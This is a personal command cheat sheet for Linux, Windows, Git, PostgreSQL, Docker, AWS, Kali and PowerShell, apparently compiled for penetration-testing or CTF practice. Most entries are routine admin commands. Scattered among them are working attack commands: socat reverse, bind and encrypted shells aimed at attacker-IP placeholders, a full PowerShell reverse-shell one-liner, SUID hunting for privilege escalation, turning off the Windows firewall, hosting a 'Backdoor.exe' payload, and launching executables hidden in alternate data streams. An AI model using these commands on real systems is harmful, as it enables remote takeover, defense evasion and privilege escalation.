Commands to resolve our problems or to facilitate our IT life :)
## Table of Contents
Linux | Windows | GitHub | PostgreSQL | Docker | AWS | Metasploit | Kali | Python | PowerShell
## Linux
The following commands get information about the OS:
`cat /proc/version`
`cat /etc/*release`
`uname -a`
`cat /etc/issue`
Get the current state of system resources such as CPU and RAM:
`top`
Find a file anywhere on the system by its name:
`find / -name name`
List the ports in use (listening TCP and UDP sockets):
`netstat -lntu`
Print the RAM used on our device (in megabytes):
`free -m`
Get information about memory and CPU usage:
`vmstat`
and
`top`
Print the list of users on the system:
`less /etc/passwd`
Find SUID files (executables that run with their owner's privileges):
`find / -perm -u=s -type f 2>/dev/null`
The idea is to edit the following file with whichever editor you prefer; in my case it is "pico".
`pico ~/.bashrc`
Add at the end of the file the alias together with the command you want it to run, in the form `alias name='command'`.
Finally, reload the file so the alias is available in the current shell:
`. ~/.bashrc`
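The alias steps above are easy to script; the following POSIX sh snippet is an added example (not part of the original cheat sheet) that appends an alias to an rc file only when that name is not already defined, so re-running it never duplicates lines. The function names are hypothetical and the demo writes to a temporary file rather than the real `~/.bashrc`.

```shell
#!/bin/sh
# Added example: idempotent alias installer for an rc file such as ~/.bashrc.
# Function names are hypothetical; the demo uses a constructed temp file.

# add_alias RCFILE NAME COMMAND
# Appends "alias NAME='COMMAND'" to RCFILE unless an alias with that NAME is
# already defined there, so running it twice never duplicates the line.
add_alias() {
    rcfile=$1; name=$2; cmd=$3
    if grep -q "^alias ${name}=" "$rcfile" 2>/dev/null; then
        return 0                      # already defined: leave the file alone
    fi
    printf "alias %s='%s'\n" "$name" "$cmd" >> "$rcfile"
}

# count_alias RCFILE NAME -> prints how many definitions of NAME RCFILE holds
count_alias() {
    grep -c "^alias $2=" "$1" 2>/dev/null || true
}

# Demo against a constructed temporary rc file, not the real ~/.bashrc.
demo_rc=$(mktemp)
add_alias "$demo_rc" ll 'ls -la'
add_alias "$demo_rc" ll 'ls -la'          # second call is a no-op
add_alias "$demo_rc" ports 'netstat -lntu'

# Load the definitions into the current shell, as the README does with ~/.bashrc:
. "$demo_rc"
```

Point `add_alias` at `~/.bashrc` (or `~/.bash_aliases`) to use it for real; the `grep -q` guard is what keeps the file clean when the script is run from provisioning tooling more than once.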
The following command finds the path of a file by name, searching from the current directory:
`find -name "file name"`
This turns off our own terminal's echo and line processing, then foregrounds the backgrounded shell, completing the process:
`stty raw -echo; fg`
The idea is to configure the following "interfaces" file with the parameters for our network connection:
`sudo pico /etc/network/interfaces`
Next, restart networking in the OS:
`sudo /etc/init.d/networking restart`
To check which neighbours on the interface are reachable (the ARP/neighbour table):
`ip neigh show`
Erase the contents of a text file without deleting it:
`truncate --size 0 logfile`
General commands to copy and erase files:
`cp -a /source/. /dest/`
`rm -r [folder]/*`
Looking for SUID-privileged files in order to escalate with them 🙈
`find / -perm -4000 2> /dev/null | xargs ls`
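The two SUID searches above are also the starting point for the defensive check: compare today's SUID list with a saved baseline so that a newly appeared SUID binary stands out. The following POSIX sh script is an added example (not part of the original cheat sheet); it applies the same `find -perm -4000` filter to a root directory and diffs against a baseline file. The function names, baseline path and temporary tree are hypothetical and constructed for the demo.

```shell
#!/bin/sh
# Added example: audit SUID files against a saved baseline. Function names
# and the temporary tree are hypothetical/constructed for the demo.

# list_suid ROOT -> every SUID regular file under ROOT, one path per line,
# sorted (the README's find filter, scoped to ROOT instead of /).
list_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# suid_diff BASELINE ROOT -> SUID files present now but absent from the
# sorted BASELINE file: the new ones an admin has to explain.
suid_diff() {
    list_suid "$2" | comm -13 "$1" -
}

# --- Constructed demo tree; nothing here touches the real filesystem ---
demo=$(mktemp -d)
mkdir -p "$demo/bin" "$demo/tmp"
printf '#!/bin/sh\n' > "$demo/bin/known_suid"
printf '#!/bin/sh\n' > "$demo/bin/plain"
printf '#!/bin/sh\n' > "$demo/tmp/new_suid"
chmod u+s "$demo/bin/known_suid" "$demo/tmp/new_suid"

# Baseline as it would have been captured earlier, before new_suid appeared.
baseline=$(mktemp)
printf '%s\n' "$demo/bin/known_suid" > "$baseline"

# new_suid_count -> number of SUID files not covered by the baseline
new_suid_count() {
    suid_diff "$baseline" "$demo" | wc -l | tr -d ' '
}

# After reviewing the findings, refresh the baseline (hypothetical path):
# list_suid / > /var/lib/suid-baseline.txt
```

Running `suid_diff` from cron and alerting on non-empty output is a cheap way to catch the privilege-escalation candidates the README's one-liner hunts for, before anyone else does; keep the baseline file owned by root and read-only so it cannot be edited by the same account that planted a new binary.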
### Reset your password
The idea is to boot into recovery mode by holding "Shift" before the login screen. Once there, remount the root filesystem read-write:
`mount -n -o remount,rw /`
Next, use the following command to reset the password of the given user:
`passwd username_here`
Take the DNS domain name and add it to /etc/hosts:
`echo <IP> spookysec.local >> /etc/hosts`
Reverse shell (the target connects back to our listener):
`socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"`
A fully stable Linux tty reverse shell:
`socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane`
Socat encrypted shells. First generate a self-signed certificate and key, then merge them into a single .pem file:
`openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt`
`cat shell.key shell.crt > shell.pem`
Target (the side providing the shell):
`socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes`
Client:
`socat OPENSSL:<TARGET-IP>:<PORT>,verify=0 -`
Note that `verify=0` disables certificate verification on both ends, so the traffic is encrypted but neither side authenticates the other.
## Windows
### socat
Bind shell (listens on the target and hands out PowerShell):
`socat TCP-L:<PORT> EXEC:powershell.exe,pipes`
### How to kill a process running in Windows
You can use netstat; enter the following to list the process bound to a given port:
`netstat -ano | findstr :8080`
With the PID of the process to kill, run:
`taskkill /PID <PID> /F`
The following command prints the name and SID of each local (SAM) user account on a Windows computer (only from an elevated cmd):
`wmic useraccount get name,sid`
Launching PowerShell from a command shell with the execution policy bypassed:
`powershell -ep bypass`
This displays the firewall status:
`netsh firewall show opmode`
This turns off the firewall for all profiles:
`netsh advfirewall set allprofiles state off`
## GitHub
How to list the remote repositories associated with the local .git:
`git remote -v`
Sometimes you need to keep some local changes and update from the master branch on GitHub without losing the work done, so first commit the files you want to keep before updating.
`git commit [some files]`
Next, update your local repository with the external changes:
`git pull origin master`
If you need to change the email registered locally, run the following command:
`git config --global user.email "you@example.com"`
## PostgreSQL
List all databases:
> \list or \l
List all tables in the current database:
> \dt
Connect to a database:
> \connect database_name
Execute a SQL file against a database (run from the OS shell, not inside psql):
> psql -f thefile.sql targetdatabase
If you want to delete all the tables in the same schema, run the following (it drops the whole public schema and everything inside it):
> DROP SCHEMA public CASCADE;
To create the schema again:
> CREATE SCHEMA public;
If you want to know the PostgreSQL version installed in your environment:
> SELECT version();
Show the definition (columns) of a view:
> \d view
***
## Docker
List the running Docker containers:
> docker ps
Stop one container by its ID:
> docker stop container_id
Get a shell inside a Docker container:
> sudo docker exec -i -t container_id /bin/bash
Remove all unused data (stopped containers, unused networks, dangling images and build cache):
> docker system prune
***
## AWS
The following command lists our S3 buckets:
`aws s3 ls`
## Metasploit
This will determine if we're in a VM
`run post/windows/gather/checkvm`
The next command will check for various exploits which we can run within our session to elevate our privileges
`run post/multi/recon/local_exploit_suggester`
# Kali
These are the commands that allow us to share a file using an Apache server:
`mkdir /var/www/html/share`
`chmod -R 755 /var/www/html/share/`
`chown -R www-data:www-data /var/www/html/share`
`service apache2 start`
`cp /root/Desktop/Backdoor.exe /var/www/html/share/`
# Python
Serve the current directory over HTTP on the given port:
`python -m http.server <port>`
The following is a way to spawn a proper TTY from a netcat shell using Python:
`python -c 'import pty;pty.spawn("/bin/bash")'`
# Powershell
Compute the MD5 hash of a file:
`Get-FileHash -Algorithm MD5 file.txt`
Getting information about Alternate Data Streams (ADS); ADS allow an NTFS file to contain more than one stream of data:
`Get-Item -Path file.exe -Stream *`
Getting a reverse shell with PowerShell (connecting back to a netcat listener):
`powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
# Others
Run an executable stored in an alternate data stream (from PowerShell):
`wmic process call create $(Resolve-Path file.exe:streamname)`